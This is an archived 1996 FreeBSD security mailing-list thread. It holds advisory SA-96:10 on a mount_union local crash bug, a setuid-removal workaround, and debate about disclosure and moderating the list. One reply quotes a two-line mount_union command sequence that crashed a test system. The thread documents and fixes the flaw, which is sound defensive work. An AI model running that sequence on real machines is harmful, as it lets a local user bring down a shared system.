Project, Inc. Web Site: http://www.freebsd.com/ Confidential contacts: security-officer@freebsd.org PGP Key: ftp://freebsd.org/pub/CERT/public_key.asc Security notifications: security-notifications@freebsd.org Security public discussion: security@freebsd.org Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary. ============================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMZ0Fz1UuHi5z0oilAQFAjQQAgiZcuB/l7nS18BhaFNayfI4ergVd2KAy Va+hrzVvQ/AzC4Jdm5xY/86muOxf4ZgIT/gu1217Jwd/Lt+6CuP0FKYX8Bw1ml9x I9x9G3bII80OrGdrJKsgvTszaPhHJxEoAwAOFB8huA+mL9hyIGDlOBumWnvEPzVh nHd155oPg6k= =TPYT -----END PGP SIGNATURE----- From owner-freebsd-security Fri May 17 17:09:02 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id RAA03368 for security-outgoing; Fri, 17 May 1996 17:09:02 -0700 (PDT) Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id RAA03326; Fri, 17 May 1996 17:08:07 -0700 (PDT) Message-Id: <199605180008.RAA03326@freefall.freebsd.org> To: freebsd-security-notifications@freebsd.org, freebsd-announce@freebsd.org cc: security@freebsd.org From: FreeBSD Security Officer Reply-To: security-officer@freebsd.org Subject: FreeBSD Security Advisory: FreeBSD-SA-96:10.mount_union Date: Fri, 17 May 1996 16:35:40 -0700 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This is the second of two related security advisory notices. -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-96:10 Security Advisory The FreeBSD Project, Inc. Topic: system stability compromise via mount_union program Category: core Module: unionfs Announced: 1996-05-17 Affects: FreeBSD 2.0, 2.0.5, 2.1, 2.1-stable, and 2.2-current Corrected: (workaround) 2.1-stable and 2.2-current as of 1996-05-17 Source: 4.4BSD (lite) FreeBSD only: no Patches: ftp://freebsd.org/pub/CERT/patches/SA-96:10/ ============================================================================= I. Background A bug was found in the union file system code which can allow an unprivileged local user to compromise system stability. This problem is present in all source code and binary distributions of FreeBSD version 2.x released before 1996-05-18. All FreeBSD users are encouraged to use the workaround provided until the FreeBSD Project distributes a full solution. II. Problem Description The union filesystem code had problems with certain mount ordering problems. By executing a certain sequence of mount_union commands, an unprivileged local user may cause a system reload. NOTE: This is a different problem than the one discussed in FreeBSD SA-96:09. The workaround for this vulnerability is similar to the one discussed in 96:09, but the proper solution for the unauthorized access problem in 96:09 does not address this vulnerability. III. Impact The problem could allow local users to compromise system stability. This vulnerability can only be exploited by users with a valid account on the local system. IV. Solution(s) The FreeBSD project is currently developing a solution to this problem, however the proper solution will not be available until a future FreeBSD release. We do not anticipate releasing patches for previous versions of FreeBSD due to the extensive nature of this fix. This security advisory will be updated as new information is made available. V. Workaround This vulnerability can quickly and easily be limited by removing the setuid permission bit from the mount_union program. This workaround will work for all versions of FreeBSD affected by this problem. As root, execute the command: % chmod u-s /sbin/mount_union then verify that the setuid permissions of the files have been removed. The permissions array should read "-r-xr-xr-x" as shown here: % ls -l /sbin/mount_union -r-xr-xr-x 1 root bin 53248 Apr 26 04:40 /sbin/mount_union In addition to changing the permissions on the executable files, if you have the source code installed, we suggest patching the sources so that mount_union will not be installed with the setuid bit set: *** /usr/src/sbin/mount_union/Makefile Sun Nov 20 14:47:52 1994 - --- /usr/src/sbin/mount_union/Makefile Fri May 17 10:36:09 1996 *************** *** 8,14 **** CFLAGS+= -I${.CURDIR}/../../sys -I${MOUNT} .PATH: ${MOUNT} - - BINOWN= root - - BINMODE=4555 - - .include - --- 8,11 ---- ============================================================================= The FreeBSD Project, Inc. Web Site: http://www.freebsd.com/ Confidential contacts: security-officer@freebsd.org PGP Key: ftp://freebsd.org/pub/CERT/public_key.asc Security notifications: security-notifications@freebsd.org Security public discussion: security@freebsd.org Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary. ============================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMZ0F01UuHi5z0oilAQGkkwP+K9KvfKokYwpfhdUBR1c9nitAHGFMl2db rzD3pl8E82fB6sluXZ8cpDToGgvN5I7bM5lEXeXOPhfIplYVihsJeWUjVPhbF20q pgfcINcYuSLcG0cLRd+ZxZjVbtC21yU44aHOEOiWMb7X79E8y9UKOVkkGcDllt0T ckaAX8totZY= =5/DV -----END PGP SIGNATURE----- From owner-freebsd-security Fri May 17 17:36:09 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id RAA05147 for security-outgoing; Fri, 17 May 1996 17:36:09 -0700 (PDT) Received: from nervosa.com (root@nervosa.com [192.187.228.86]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id RAA05098; Fri, 17 May 1996 17:36:00 -0700 (PDT) Received: from onyx.nervosa.com (coredump@onyx.nervosa.com [10.0.0.1]) by nervosa.com (8.7.5/8.7.3) with SMTP id RAA26309; Fri, 17 May 1996 17:35:31 -0700 (PDT) Date: Fri, 17 May 1996 17:35:30 -0700 (PDT) From: invalid opcode To: Garrett Wollman cc: Paul Traina , "Jordan K. Hubbard" , davidg@Root.COM, "Jordan K. Hubbard" , committers@freefall.freebsd.org, security@freebsd.org Subject: Re: cvs commit: src/sbin Makefile In-Reply-To: <9605171821.AA05895@halloran-eldar.lcs.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Fri, 17 May 1996, Garrett Wollman wrote: > mount_msdos is also affected. All of the mount_* programs can be > affected if `root' has an insecure path and attempts to mount a > filesystem type not already in the kernel. > -GAWollman mount_msdos always returned an EPERM, so I assume it may be vulnerable but not possible to exploit? == Chris Layne ======================================== Nervosa Computing == == coredump@nervosa.com ================ http://www.nervosa.com/~coredump == From owner-freebsd-security Fri May 17 19:22:43 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id TAA11697 for security-outgoing; Fri, 17 May 1996 19:22:43 -0700 (PDT) Received: from neptune.pristine.com.tw ([192.72.150.2]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id TAA11685; Fri, 17 May 1996 19:22:29 -0700 (PDT) Received: (from team_fbf@localhost) by neptune.pristine.com.tw (8.6.11/8.6.9) id KAA17233; Sat, 18 May 1996 10:21:47 GMT From: ywliu Message-Id: <199605181021.KAA17233@neptune.pristine.com.tw> Subject: Re: very bad To: jkh@time.cdrom.com (Jordan K. Hubbard) Date: Sat, 18 May 1996 10:21:47 +0000 () Cc: coredump@nervosa.com, freebsd-security@freebsd.org, security-officer@freebsd.org In-Reply-To: <13470.832320504@time.cdrom.com> from "Jordan K. Hubbard" at May 17, 96 01:08:24 am X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > You know though, for ones this bad I'd really rather you sent the > message to security-officer@freebsd.org rather than freebsd-security I believe not so many of us know this e-mail address. We need to make it easy to see in the handbook or FAQ. Yen-Wei Liu From owner-freebsd-security Fri May 17 19:24:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id TAA11857 for security-outgoing; Fri, 17 May 1996 19:24:36 -0700 (PDT) Received: from neptune.pristine.com.tw ([192.72.150.2]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id TAA11851 for ; Fri, 17 May 1996 19:24:30 -0700 (PDT) Received: (from team_fbf@localhost) by neptune.pristine.com.tw (8.6.11/8.6.9) id KAA17289; Sat, 18 May 1996 10:24:02 GMT From: ywliu Message-Id: <199605181024.KAA17289@neptune.pristine.com.tw> Subject: Re: very bad To: vjojic@EUnet.yu (Vladimir Jojic) Date: Sat, 18 May 1996 10:24:01 +0000 () Cc: freebsd-security@freebsd.org In-Reply-To: <199605171009.MAA00475@EUnet.yu> from "Vladimir Jojic" at May 17, 96 12:09:30 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > I am not very familiar with mailing list programs, but there is posible > improvment (if it isn't yet done): > > - add special class of mailing list, such as security list I suggest we should make freebsd-security a moderated mailing list. So the moderator can filter the information before it was sent out. Yen-Wei Liu From owner-freebsd-security Fri May 17 19:29:25 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id TAA12256 for security-outgoing; Fri, 17 May 1996 19:29:25 -0700 (PDT) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id TAA12249; Fri, 17 May 1996 19:29:20 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by time.cdrom.com (8.7.5/8.6.9) with SMTP id TAA08771; Fri, 17 May 1996 19:28:58 -0700 (PDT) To: kduling@natasha.scccc.com (Kevin J. Duling) cc: owner-freebsd-security@freefall.freebsd.org (Glen Foster), coredump@nervosa.com, freebsd-security@freebsd.org Subject: Re: very bad In-reply-to: Your message of "Fri, 17 May 1996 10:16:36 MDT." <199605171616.KAA15759@natasha.scccc.com> Date: Fri, 17 May 1996 19:28:57 -0700 Message-ID: <8769.832386537@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > If you don't announce the bugs, then the crackers learn them while the > admins are left in ignorance. You're not going to find a forum where > you know you're only telling "the right people" about the problem. I don't disagree in principle, but I still think that a slavish adherance to either a "don't tell anything" or "tell everyone" philosophy is a mistake, and each situation should be handled on a case by case basis. In some cases you're informing the populace of a very important piece of information and in others you're simply handling the baby a blasting cap to play with. Jordan From owner-freebsd-security Fri May 17 20:15:52 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id UAA15641 for security-outgoing; Fri, 17 May 1996 20:15:52 -0700 (PDT) Received: from gallup.cia-g.com (root@gallup.cia-g.com [206.206.162.10]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id UAA15636 for ; Fri, 17 May 1996 20:15:48 -0700 (PDT) Received: from gallup.cia-g.com (gallup.cia-g.com [206.206.162.10]) by gallup.cia-g.com (8.6.11/8.6.9) with SMTP id VAA30204; Fri, 17 May 1996 21:16:16 -0600 Date: Fri, 17 May 1996 21:16:15 -0600 (MDT) From: Stephen Fisher To: ywliu cc: Vladimir Jojic , freebsd-security@freebsd.org Subject: Re: very bad In-Reply-To: <199605181024.KAA17289@neptune.pristine.com.tw> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I'll second that. On Sat, 18 May 1996, ywliu wrote: > > > > I am not very familiar with mailing list programs, but there is posible > > improvment (if it isn't yet done): > > > > - add special class of mailing list, such as security list > > I suggest we should make freebsd-security a moderated mailing list. So the > moderator can filter the information before it was sent out. > > Yen-Wei Liu > From owner-freebsd-security Fri May 17 20:31:53 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id UAA18155 for security-outgoing; Fri, 17 May 1996 20:31:53 -0700 (PDT) Received: from mail.barrnet.net (mail.barrnet.net [131.119.246.7]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id UAA18144; Fri, 17 May 1996 20:31:44 -0700 (PDT) Received: from apocalypse.superlink.net (apocalypse.superlink.net [205.246.27.150]) by mail.barrnet.net (8.7.5/MAIL-RELAY-LEN) with ESMTP id UAA18992; Fri, 17 May 1996 20:31:38 -0700 (PDT) Received: (from marxx@localhost) by apocalypse.superlink.net (8.7.5/8.7.3) id TAA01275; Fri, 17 May 1996 19:40:11 -0400 (EDT) Date: Fri, 17 May 1996 19:40:10 -0400 (EDT) From: "Charles C. Figueiredo" To: FreeBSD Security Officer cc: freebsd-security-notifications@FreeBSD.ORG, freebsd-announce@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-96:09.vfsload In-Reply-To: <199605172330.QAA02390@precipice.shockwave.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Most of the mount code that uses vfs module management routines is going to have to be greatly changed to fix the problem, not just that patch, my other post suggests ways. Marxx "I don't want to grow up, I'm a BSD kid. There's so many toys in /usr/bin that I can play with!" ------------------------------------------------------------------------------ Charles C. Figueiredo Marxx marxx@superlink.net ------------------------------------------------------------------------------ From owner-freebsd-security Fri May 17 20:37:02 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id UAA18914 for security-outgoing; Fri, 17 May 1996 20:37:02 -0700 (PDT) Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.2.228.19]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id UAA18900 for ; Fri, 17 May 1996 20:36:54 -0700 (PDT) Received: (from bde@localhost) by godzilla.zeta.org.au (8.6.12/8.6.9) id NAA18119; Sat, 18 May 1996 13:32:10 +1000 Date: Sat, 18 May 1996 13:32:10 +1000 From: Bruce Evans Message-Id: <199605180332.NAA18119@godzilla.zeta.org.au> To: coredump@nervosa.com, kato@eclogite.eps.nagoya-u.ac.jp Subject: Re: BoS: SECURITY BUG in FreeBSD (fwd) Cc: freebsd-security@FreeBSD.ORG Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk >> mount_union ~/a ~/b >> mount_union -b ~/a ~/b >My FreeBSD-current (I supped sources on May 17.) box crashed just >after `mount_union -b ~/a ~/b' operation. Stack trace shows: >_ufs_ihashget: recursive lock not expected -- pid 188 <--- mount_union That's another problem with mount_union :-(. Somehow it hasn't crashed here yet after I ran the above and `mount_union ~/c ~/d' to test this and wasn't able to unmount them. Now I remember how to unmount them: run `mount' to see what is mounted and then unmount the name in the device column: `umount ""'. Another problem with mount_union is that getdirentries() doesn't work for the lkm version. I have the union file system statically configured to test it. This may have helped avoid the above panic. It normally hangs instead of panicing. Bruce From owner-freebsd-security Fri May 17 20:58:01 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id UAA20797 for security-outgoing; Fri, 17 May 1996 20:58:01 -0700 (PDT) Received: from mail.barrnet.net (mail.barrnet.net [131.119.246.7]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id UAA20792 for ; Fri, 17 May 1996 20:57:58 -0700 (PDT) Received: from io.org (io.org [198.133.36.1]) by mail.barrnet.net (8.7.5/MAIL-RELAY-LEN) with SMTP id UAA19013 for ; Fri, 17 May 1996 20:57:56 -0700 (PDT) Received: from zap.io.org (taob@zap.io.org [198.133.36.81]) by io.org (8.6.12/8.6.12) with SMTP id XAA11148 for ; Fri, 17 May 1996 23:53:13 -0400 Date: Fri, 17 May 1996 23:52:11 -0400 (EDT) From: Brian Tao To: FREEBSD-SECURITY-L Subject: Re: very bad (fwd) In-Reply-To: <199605180004.SAA01785@shell.aros.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > ----- Forwarded message from invalid opcode ----- > > Too bad it's already on BUGTRAQ and BoS which is way more than 1000 :-( BTW, what are the subscribe addresses to those two lists? -- Brian Tao (BT300, taob@io.org, taob@ican.net) Systems and Network Administrator, Internet Canada Corp. "Though this be madness, yet there is method in't" From owner-freebsd-security Fri May 17 20:58:55 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id UAA20869 for security-outgoing; Fri, 17 May 1996 20:58:55 -0700 (PDT) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id UAA20856 for ; Fri, 17 May 1996 20:58:51 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by rover.village.org (8.7.5/8.6.6) with SMTP id VAA12168; Fri, 17 May 1996 21:58:35 -0600 (MDT) Message-Id: <199605180358.VAA12168@rover.village.org> To: Jeff Hupp Subject: Re: very bad Cc: freebsd-security@FreeBSD.org In-reply-to: Your message of Fri, 17 May 1996 16:51:27 CDT Date: Fri, 17 May 1996 21:58:35 -0600 From: Warner Losh Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk : Security through obscurity does not work. Spreading the word far : and wide is the only hope of getting the word in all the right hands. If it : gets out at all it will end up in the wrong hand. I know seeing the problem here strongly motivated me to fix all the machines in the village that had this problem pronto. I appreciate finding out about it. Warner From owner-freebsd-security Fri May 17 21:05:20 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id VAA21507 for security-outgoing; Fri, 17 May 1996 21:05:20 -0700 (PDT) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id VAA21494 for ; Fri, 17 May 1996 21:05:14 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by rover.village.org (8.7.5/8.6.6) with SMTP id WAA12186 for ; Fri, 17 May 1996 22:05:12 -0600 (MDT) Message-Id: <199605180405.WAA12186@rover.village.org> To: freebsd-security@FreeBSD.org Subject: Re: very bad In-reply-to: Your message of Sat, 18 May 1996 10:24:01 -0000 Date: Fri, 17 May 1996 22:05:11 -0600 From: Warner Losh Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk : I suggest we should make freebsd-security a moderated mailing list. So the : moderator can filter the information before it was sent out. I *STRONGLY* disagree. People have shown good judgement here on the whole and one minor borderline case shouldn't force this change. True it was Friday night in Au and NZ, but it was the middle of the day here and it got a lot of people motivated to quickly "fix" the problem with the chmod, myself included. Until such time as this list regularlly discloses information about problems in an irresponsible matter, the status quo is good enough. BTW, I would highly recommend people subscribe to BOS. It has lots of even more explicit and dangerous goodies that get posted from time to time. Warner From owner-freebsd-security Fri May 17 21:17:37 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id VAA22315 for security-outgoing; Fri, 17 May 1996 21:17:37 -0700 (PDT) Received: from bdd.net ([207.61.78.33]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id VAA22310 for ; Fri, 17 May 1996 21:17:34 -0700 (PDT) Received: from localhost (james@localhost) by bdd.net (8.7.5/8.7.3) with SMTP id AAA02356; Sat, 18 May 1996 00:17:26 -0400 (EDT) Date: Sat, 18 May 1996 00:17:24 -0400 (EDT) From: James FitzGibbon To: Glen Foster cc: security@FreeBSD.org Subject: Re: cvs commit: src/sbin Makefile In-Reply-To: <199605171948.PAA00619@ptavv.nsta.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Fri, 17 May 1996, Glen Foster wrote: > How about rather than changing the Makefile to not install suid, the > full path of modload be referenced in the source. Preserves the suid > functionality and defeats the symlink attack. Alternatively, the union fs could be set as only available statically, couldn't it? If it didn't try to load an lkm, modload would never be referenced, by relative or absolute path. -- j. ---------------------------------------------------------------------------- | James FitzGibbon james@nexis.net | | Integrator, The Nexis Group Voice/Fax : 416 410-0100 | ---------------------------------------------------------------------------- From owner-freebsd-security Sat May 18 00:02:06 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id AAA02677 for security-outgoing; Sat, 18 May 1996 00:02:06 -0700 (PDT) Received: from nervosa.com (root@nervosa.com [192.187.228.86]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id AAA02671 for ; Sat, 18 May 1996 00:02:01 -0700 (PDT) Received: from onyx.nervosa.com (coredump@onyx.nervosa.com [10.0.0.1]) by nervosa.com (8.7.5/8.7.3) with SMTP id AAA27943; Sat, 18 May 1996 00:01:54 -0700 (PDT) Date: Sat, 18 May 1996 00:01:53 -0700 (PDT) From: invalid opcode To: Brian Tao cc: FREEBSD-SECURITY-L Subject: Re: very bad (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Fri, 17 May 1996, Brian Tao wrote: > BTW, what are the subscribe addresses to those two lists? > Brian Tao (BT300, taob@io.org, taob@ican.net) >From what I remember you send an email to LISTSERV@NETSPACE.ORG with the body of SUBSCRIBE BUGTRAQ. == Chris Layne ======================================== Nervosa Computing == == coredump@nervosa.com ================ http://www.nervosa.com/~coredump == From owner-freebsd-security Sat May 18 12:53:53 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id MAA16623 for security-outgoing; Sat, 18 May 1996 12:53:53 -0700 (PDT) Received: from multivac.orthanc.com (root@multivac.orthanc.com [206.12.238.2]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id MAA16617 for ; Sat, 18 May 1996 12:53:48 -0700 (PDT) Received: from orodruin.orthanc.com (root@orodruin.orthanc.com [206.12.238.3]) by multivac.orthanc.com (8.7.5/8.7.3) with ESMTP id MAA19426 for ; Sat, 18 May 1996 12:53:21 -0700 (PDT) Received: from localhost (lyndon@localhost) by orodruin.orthanc.com (8.7.5/8.7.3) with SMTP id MAA09696 for ; Sat, 18 May 1996 12:53:37 -0700 (PDT) Message-Id: <199605181953.MAA09696@orodruin.orthanc.com> X-Authentication-Warning: orodruin.orthanc.com: lyndon owned process doing -bs X-Authentication-Warning: orodruin.orthanc.com: Host lyndon@localhost didn't use HELO protocol From: Lyndon Nerenberg VE7TCP To: freebsd-security@freebsd.org Subject: Re: very bad In-reply-to: Your message of "Fri, 17 May 1996 22:05:11 MDT." <199605180405.WAA12186@rover.village.org> Date: Sat, 18 May 1996 12:53:36 -0700 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >>>>> "Warner" == Warner Losh writes: Warner> force this change. True it was Friday night in Au and NZ, Warner> but it was the middle of the day here and it got a lot of Warner> people motivated to quickly "fix" the problem with the Warner> chmod, myself included. We all have to remember that it will *always* be the middle of the night *somewhere* when a security announcement is sent out. This is a _global_ network, folks. --lyndon From owner-freebsd-security Sat May 18 13:05:44 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id NAA17423 for security-outgoing; Sat, 18 May 1996 13:05:44 -0700 (PDT) Received: from precipice.shockwave.com (precipice.shockwave.com [171.69.108.33]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id NAA17416 for ; Sat, 18 May 1996 13:05:39 -0700 (PDT) Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.7.5/8.7.3) with ESMTP id NAA06811; Sat, 18 May 1996 13:04:00 -0700 (PDT) Message-Id: <199605182004.NAA06811@precipice.shockwave.com> To: ywliu cc: vjojic@EUnet.yu (Vladimir Jojic), freebsd-security@FreeBSD.ORG Subject: Re: very bad In-reply-to: Your message of "Sat, 18 May 1996 10:24:01 -0000." <199605181024.KAA17289@neptune.pristine.com.tw> Date: Sat, 18 May 1996 13:03:59 -0700 From: Paul Traina Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk From: ywliu Subject: Re: very bad I suggest we should make freebsd-security a moderated mailing list. So the moderator can filter the information before it was sent out. Then it will just show up elsehwere. There's freebsd-security-notifications which is a moderated mailing list for anouncements. This allows admins who wish to not receive discussion mail to subscribe.